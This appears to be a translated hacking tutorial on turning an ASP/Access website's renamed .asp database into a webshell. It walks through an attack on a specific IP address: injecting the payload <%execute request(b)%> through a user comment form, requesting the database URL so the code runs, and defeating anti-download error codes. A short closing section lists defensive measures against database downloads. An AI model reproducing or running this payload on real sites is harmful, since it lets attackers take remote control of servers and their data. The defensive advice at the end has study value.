Maybe with the development of network security technology, the quality of administrators is improving. When using the access+asp system, in order to prevent the database from being downloaded, the mdb is changed to asp or asa. Let’s not talk about changing the suffix directly. You can directly download it using tools such as Internet Express. In fact, you have already opened the door for intruders. Intruders can use the database with asp/asa suffix to directly obtain the webshell.
one. Ideas
Everyone knows that <%%> is the identifier of an asp file, which means that an asp file will only execute the code between <%%>. All data of the access+asp web system is stored in the database file (mdb file ), since the administrator changed the mdb file to an asp file, if the data we submit contains <%%>, then when we access the asp database, the code between <%%> will be executed. This causes us to only submit malicious code to the database, so the database with the asp suffix is our webshell.
two. Example
Just find a target. First, let’s check the database to see if it has an asp suffix: http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210
return:
Copy the code code as follows:
Microsoft VBScript compiler error error '800a03f6'
'End' is missing
/iisHelp/common/500-100.asp, line 242
Microsoft JET Database Engine error '80004005'
'D:/log_mdb/%29dlog_mdb%29.asp' is not a valid path. Determine whether the path name is spelled correctly and whether you are connected to the server where the file is stored.
/test/conn.asp, line 18
We submit: http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp returns a bunch of garbled characters, so that we can directly download the database using tools such as Internet Express (we will not discuss it here). We return to the homepage and see that there is a netizen comment function. Let’s register as a user and post a comment:
<%execute request(b)%>
In this way, we write the asp code: <%execute request(b)%> into the database, then the database: is our webshell. Submit: http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp At the end of the garbled code we see:
Copy the code code as follows:
/iisHelp/common/500-100.asp, line 242
Microsoft VBScript runtime error error '800a000d'
Type mismatch: 'execute'
/test/dlog/log_mdb/%29dlog_mdb%29.asp, line 1266
Note: When we submit code to the database, the code content cannot be too large. So we use <%execute request(b)%>.
three. Some other questions and ideas
1. For the database that changed the suffix to asp, and added illegal asp codes such as <%='a'-1%> to the database to completely prevent downloading, because there are illegal asp codes in it, after inserting our webshell code Running it will only display the error of the previous illegal code without executing the code of our shell. Although this can prevent certain attacks, there are still certain hidden dangers. As long as we add error-compatible code before the error code, we can correctly display and execute the webshell code we inserted.
2. For those files that have not changed the suffix, that is, mdb files, we can download them directly to get the background password. After entering the background, we can use the database backup to change the suffix to asp.
Summary of mdb anti-download methods
1: Under iis6, if an extension is not defined, a 404 error of file not found will appear when accessing.
Therefore, you can arbitrarily name the database into a file name that will never appear to achieve a safe effect, such as: xxxxx.xxxxxxxxxxx
2 If the database is placed outside the website, it will never be accessible. For example: e:/web/ is your website
Then put the database in e:/
3. As mentioned above, change .mdb to .asp and at the same time pour into a special table containing <% binary characters. In this way, when accessing the file, a prompt of missing script closing character will appear.
4. Or change .mdb to .asp and open it with winhex at the same time. You can find that there is a long part of 00 string after 176. You can also prevent downloading by changing it into a piece of asp code at will, which will not affect the database function. For example:
<%
response.write(illegal access)
response.end()
%>
Now adding # and spaces in the name of the database will be cracked. For example, # = <%35 and spaces = <%20.
So it is no longer useful to use these now. .
If it is your own server, set it up in IIS:
Create a new blank DLL file, and then add mapping in IIS. Select the DLL you just created as the executable file, fill in .mdb as the extension, save and restart the IIS service.